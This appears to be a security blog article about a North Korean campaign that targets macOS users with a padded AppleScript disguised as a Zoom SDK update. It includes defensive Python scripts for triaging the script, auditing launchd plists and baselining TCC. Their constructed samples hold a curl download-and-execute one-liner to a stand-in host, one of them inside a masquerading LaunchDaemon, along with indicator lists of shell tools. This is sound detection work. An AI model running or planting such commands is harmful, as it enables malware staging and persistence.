
Imagine being tricked into downloading what looks like a safe update for your Zoom app and instead handing attackers your passwords and cryptocurrency. That is what the Sapphire Sleet group is doing, and it is a reminder to be careful about what you download and run.
What Happened
Microsoft Threat Intelligence has uncovered a new campaign by the North Korean threat actor Sapphire Sleet, which targets macOS users through social engineering rather than exploiting software vulnerabilities. The campaign involves tricking users into executing a malicious file disguised as a Zoom SDK update, allowing the attackers to steal sensitive information such as passwords, cryptocurrency assets, and personal data. This approach highlights the importance of user awareness and layered security defenses.
Who's Affected
Sapphire Sleet primarily targets individuals and organizations in the cryptocurrency, finance, venture capital, and blockchain sectors. The campaign's reliance on social engineering makes it particularly dangerous, as it preys on users' trust and familiarity with legitimate software updates.
How It Works
The attack begins with Sapphire Sleet impersonating a job recruiter on professional networking platforms and building rapport with the target before directing them to download a file named "Zoom SDK Update.scpt". A .scpt file is a compiled AppleScript; double-clicking it opens it in Script Editor, an Apple-signed application, so nothing in the workflow looks unusual to the user or raises a security flag. The script pads its source with thousands of blank lines so that the malicious code sits far below the visible window and the visible portion appears benign.
Once the user runs it, the script invokes the legitimate macOS softwareupdate binary with an invalid parameter so that a real Apple process appears in the process list, then uses curl to fetch additional payloads. The result is a multi-stage attack that collects sensitive information and registers the compromised device with Sapphire Sleet's command-and-control servers.
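The two traits described above (a script padded with blank lines, and shell commands that call softwareupdate and curl) are exactly what a responder would look for when handed a suspicious .scpt. The following is an added example written for this article, not code from Microsoft Threat Intelligence or from the campaign itself: it triages the decompiled text of a .scpt file. Because .scpt is compiled, it assumes you first run the built-in macOS tool `osadecompile "Zoom SDK Update.scpt" > update.applescript`; the sample scripts, the indicator list and the hostname update.example.invalid are constructed for illustration.

```python
"""Static triage of a decompiled AppleScript (.scpt) file.

Added example for this article; not code from Microsoft or the campaign.
On macOS, decompile first:  osadecompile "Zoom SDK Update.scpt" > update.applescript
The functions below take that decompiled text. Samples are constructed.
"""
from __future__ import annotations
import re

# Commands that have no business inside an "SDK update" script (constructed list).
SUSPICIOUS_TOKENS = ("softwareupdate", "curl", "wget", "base64", "chmod +x",
                     "osascript", "launchctl", "/tmp/")

# `do shell script "..."` hands the literal to /bin/sh; the pattern allows \" escapes.
SHELL_LITERAL_RE = re.compile(r'do shell script\s+"((?:[^"\\]|\\.)*)"', re.IGNORECASE)
SHELL_ANY_RE = re.compile(r'\bdo shell script\b', re.IGNORECASE)


def blank_line_ratio(text: str) -> float:
    """Fraction of lines that are empty or whitespace-only."""
    lines = text.splitlines()
    if not lines:
        return 0.0
    return sum(1 for ln in lines if not ln.strip()) / len(lines)


def extract_shell_commands(text: str) -> list[str]:
    """Shell command strings passed as literals to `do shell script`."""
    return [m.group(1).replace('\\"', '"') for m in SHELL_LITERAL_RE.finditer(text)]


def triage(text: str, padding_threshold: float = 0.9) -> dict:
    """Score a decompiled script and return the evidence, not just a verdict."""
    cmds = extract_shell_commands(text)
    literal_count = len(cmds)
    total_count = len(SHELL_ANY_RE.findall(text))
    hits = sorted({tok for cmd in cmds for tok in SUSPICIOUS_TOKENS if tok in cmd})
    ratio = blank_line_ratio(text)
    reasons: list[str] = []
    if ratio >= padding_threshold:
        reasons.append(f"{ratio:.1%} of lines are blank (padding that pushes code off-screen)")
    if hits:
        reasons.append("shell commands reference: " + ", ".join(hits))
    if total_count > literal_count:
        # The command was built from variables or concatenation, so the static
        # extractor cannot see it; that alone warrants a manual look.
        reasons.append(f"{total_count - literal_count} non-literal do shell script call(s)")
    return {"blank_ratio": ratio, "shell_commands": cmds, "indicators": hits,
            "suspicious": bool(reasons), "reasons": reasons}


# Constructed sample: two shell calls hidden under 3000 blank lines.
SAMPLE_PADDED = (
    "-- Zoom SDK Update\n" + "\n" * 3000
    + 'do shell script "/usr/sbin/softwareupdate --not-a-real-flag >/dev/null 2>&1"\n'
    + 'do shell script "curl -s https://update.example.invalid/stage2 -o /tmp/.u '
      '&& chmod +x /tmp/.u && /tmp/.u"\n'
)
# Constructed benign script for comparison.
SAMPLE_BENIGN = 'display dialog "Zoom SDK is up to date"\n'

if __name__ == "__main__":
    for name, text in (("padded", SAMPLE_PADDED), ("benign", SAMPLE_BENIGN)):
        result = triage(text)
        print(name, "SUSPICIOUS" if result["suspicious"] else "clean")
        for reason in result["reasons"]:
            print("  -", reason)
```

The blank-line ratio is reported separately from the command indicators because either one alone is weak evidence: a legitimate script can shell out to curl, and a sloppy script can have whitespace. Both together, in a file a recruiter asked you to open, is the pattern this campaign relies on. Scripts that assemble the command in a variable defeat the literal extractor, which is why the non-literal count is surfaced rather than silently ignored.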
What's at Risk
The malware harvests a wide range of sensitive data, including login credentials, cryptocurrency wallet keys, Telegram session data, and SSH keys. Stolen data is compressed and uploaded silently to attacker-controlled servers over port 8443. Because the victim opens the file and runs it inside Apple's own Script Editor, macOS protections such as Gatekeeper and Transparency, Consent, and Control (TCC) are sidestepped rather than broken: execution happens in a user-initiated context, which lets the malware operate without tripping those controls.
Patch Status
There is no software vulnerability to patch; the campaign depends entirely on the user running the script. In response to its discovery, Apple has shipped XProtect signature updates and enhanced Safe Browsing protections in Safari to detect and block the infrastructure associated with Sapphire Sleet, so keeping macOS and Safari up to date is how users receive those protections.
Immediate Actions
To protect against this type of attack, users should:
Do Now
- 1.Be cautious of unsolicited requests to run terminal commands or open script files during online interactions, especially from recruiters and during job interviews.
- 2.Block compiled AppleScript (.scpt) files from running until they have been reviewed; a .scpt can be decompiled and read with the built-in osadecompile tool before anyone double-clicks it.
Do Next
- 3.Audit LaunchDaemon plist files for any unexpected entries that could indicate malware persistence.
- 4.Monitor the TCC database for unauthorized changes, which could signal a compromise.
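Steps 3 and 4 above are routine checks rather than one-off responses, so they are worth scripting. The following is an added example written for this article, not code from Microsoft or Apple: it audits launchd persistence plists with the standard-library plistlib and records a digest baseline of the TCC databases for later comparison. The heuristics (Apple-style labels outside /System/Library, interpreter one-liners, curl or /tmp in the command line), the two sample plists and the hostname update.example.invalid are constructed assumptions; the launchd and TCC paths are the standard macOS locations. It is meant to be run on the Mac being checked, and reading the system TCC.db requires root plus Full Disk Access.

```python
"""Audit launchd persistence and baseline the TCC database on macOS.

Added example for this article, not code from Microsoft or Apple. Standard
library only. Sample plists are constructed. Reading the system TCC.db needs
root and Full Disk Access; the per-user TCC.db needs Full Disk Access for the
terminal you run this from.
"""
from __future__ import annotations
import hashlib
import os
import plistlib
from pathlib import Path

LAUNCHD_DIRS = ("/Library/LaunchDaemons", "/Library/LaunchAgents",
                os.path.expanduser("~/Library/LaunchAgents"))
TCC_DB_PATHS = ("/Library/Application Support/com.apple.TCC/TCC.db",
                os.path.expanduser("~/Library/Application Support/com.apple.TCC/TCC.db"))
INTERPRETERS = ("/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/osascript",
                "/usr/bin/python3", "/usr/bin/perl")
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/",
                    "/Applications/", "/opt/")
# Constructed indicator list; tune to your environment.
RISKY_TOKENS = ("curl ", "wget ", "/tmp/", "/var/tmp/", "base64", "osascript ",
                "| sh", "|sh", "chmod +x")


def audit_plist(data: bytes, source: str) -> list[str]:
    """Return findings for one launchd job (empty list = nothing notable)."""
    try:
        job = plistlib.loads(data)
    except Exception as exc:  # a malformed plist in these folders is itself notable
        return [f"{source}: unparseable plist ({exc})"]
    label = str(job.get("Label", ""))
    args = [str(a) for a in (job.get("ProgramArguments") or [])]
    if job.get("Program"):
        args.insert(0, str(job["Program"]))
    if not args:
        return [f"{source}: no Program or ProgramArguments"]
    cmd = " ".join(args)
    findings: list[str] = []
    # Genuine Apple jobs live under /System/Library; an Apple-looking label
    # anywhere else is a masquerade worth a look.
    if label.startswith("com.apple.") and not source.startswith("/System/Library/"):
        findings.append(f"{source}: Apple-style label '{label}' outside /System/Library")
    if args[0] in INTERPRETERS:
        findings.append(f"{source}: runs an interpreter one-liner: {cmd}")
    elif not args[0].startswith(TRUSTED_PREFIXES):
        findings.append(f"{source}: executable in unusual location: {args[0]}")
    hits = [t for t in RISKY_TOKENS if t in cmd]
    if hits:
        findings.append(f"{source}: command line contains {hits}: {cmd}")
    return findings


def scan_launchd(dirs=LAUNCHD_DIRS) -> list[str]:
    """Audit every *.plist in the launchd folders that exist on this machine."""
    findings: list[str] = []
    for d in dirs:
        folder = Path(d)
        if not folder.is_dir():
            continue
        for p in sorted(folder.glob("*.plist")):
            try:
                findings += audit_plist(p.read_bytes(), str(p))
            except OSError as exc:
                findings.append(f"{p}: unreadable ({exc})")
    return findings


def file_digest(path: str) -> str | None:
    """SHA-256 of a file, or None if it is missing or unreadable."""
    try:
        with open(path, "rb") as fh:
            return hashlib.sha256(fh.read()).hexdigest()
    except OSError:
        return None


def tcc_baseline(paths=TCC_DB_PATHS) -> dict[str, str | None]:
    """Record current digests; persist the result and compare later with tcc_changes."""
    return {p: file_digest(p) for p in paths}


def tcc_changes(baseline: dict[str, str | None]) -> list[str]:
    """Paths whose digest differs from the baseline. Granting any permission
    also rewrites TCC.db, so a hit means 'inspect', not 'incident'."""
    return [p for p, old in baseline.items() if file_digest(p) != old]


# Constructed samples: an ordinary vendor agent and a masquerading stager.
SAMPLE_BENIGN = plistlib.dumps({
    "Label": "com.example.agent",
    "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/agent", "--daemon"],
    "RunAtLoad": True,
})
SAMPLE_SUSPICIOUS = plistlib.dumps({
    "Label": "com.apple.softwareupdate.helper",
    "ProgramArguments": ["/bin/sh", "-c",
                         "curl -s https://update.example.invalid/s -o /tmp/.u; chmod +x /tmp/.u; /tmp/.u"],
    "RunAtLoad": True, "KeepAlive": True,
})

if __name__ == "__main__":
    for line in scan_launchd():
        print(line)
    for line in audit_plist(SAMPLE_SUSPICIOUS, "/Library/LaunchDaemons/com.apple.softwareupdate.helper.plist"):
        print("sample:", line)
```

Run `scan_launchd()` from a root shell to cover /Library/LaunchDaemons and the per-user agents. For TCC, store the output of `tcc_baseline()` (for example as JSON) and rerun `tcc_changes()` on a schedule; a changed digest right after someone opened a "Zoom SDK Update" file is the signal to pull the process history for that session.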
Conclusion
The Sapphire Sleet campaign is a stark reminder of how threat actors now favor social engineering over technical exploits. Because the attack depends on user interaction rather than a software vulnerability, it bypasses traditional security measures, and the countermeasures are user awareness, layered defenses, and routine checks for persistence and data access rather than a single patch.